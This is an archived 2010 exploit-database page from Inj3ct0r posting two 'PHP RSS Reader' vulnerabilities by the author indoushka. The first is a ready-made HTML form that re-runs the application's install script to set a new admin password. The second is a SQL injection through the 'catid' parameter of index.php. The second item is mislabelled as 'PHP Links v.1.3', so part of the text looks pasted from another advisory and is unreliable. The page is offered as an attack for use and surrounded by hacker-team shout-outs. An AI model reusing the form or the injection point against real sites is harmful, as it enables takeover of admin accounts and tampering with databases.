Home / os / win7

[webapps / 0day] - PHP RSS Reader Multiple Vulnerability

Posted on 24 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>PHP RSS Reader Multiple Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 24 Sep 2010 | Exploit category: webapps / 0day | Exploit author: indoushka | Inj3ct0r exploit database' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>===================================== PHP RSS Reader Multiple Vulnerability ===================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /&#039; __ /&#039;__` / \__ /&#039;__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /&#039; _ ` / /_/_\_&lt;_ /&#039;___ / /`&#039;__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ &gt;&gt; Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ####################################### 1 0 I&#039;m indoushka member from Inj3ct0r Team 1 1 ####################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ######################################################################## # Vendor: http://www.phprssreader.com/ # Date: 2010-07-27 # Author : indoushka # Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! # Contact : 00213771818860 # Home : www.sec4ever.net # Tested on : windows SP2 Fran?ais V.(Pnx2 2.0) ######################################################################## # Exploit By indoushka 1 - Reinstallation Wizard : &lt;/style&gt; &lt;div id=&quot;content&quot;&gt; &lt;h1&gt;PHP RSS Reader&lt;/h1&gt; &lt;h2&gt;Reinstallation Wizard&lt;/h2&gt; &lt;form action=&quot;http://127.0.0.1/php_rss_reader_2.0/install.php?action=install&quot; method=&quot;POST&quot;&gt; &lt;label&gt;Admin Password:&lt;/label&gt; &lt;input type=&quot;password&quot; id=&quot;acp_password&quot; name=&quot;acp_password&quot; value=&quot;&quot; tabindex=&quot;8&quot;&gt;* &lt;/li&gt; &lt;/fieldset&gt; &lt;fieldset&gt; &lt;ul&gt; &lt;li&gt; &lt;input class=&quot;submit&quot; type=&quot;submit&quot; value=&quot;Install&quot; tabindex=&quot;9&quot;&gt; &lt;input type=&quot;hidden&quot; value=&quot;add&quot; name=&quot;action&quot;&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/fieldset&gt; &lt;/form&gt; &lt;/div&gt; &lt;/body&gt; &lt;/html&gt; &lt;?php ?&gt; ------------- 2 - PHP Links v.1.3 SQL Injection : Vulnerability description : Input passed to the &quot;catid&quot; parameter in &quot;index.php&quot; is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Confirmed in version 1.3. Other versions may also be affected. Affected items: /php_rss_reader_2.0/index.php The impact of this vulnerability: The remote attacker can manipulate SQL queries by injecting arbitrary SQL cod. How to fix this vulnerability: Edit the source code to ensure that input is properly sanitised. Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel =========================== special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te --------------------------------------------------------------------------------------------------------------------------------- # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-24]</pre></body></html>

 

TOP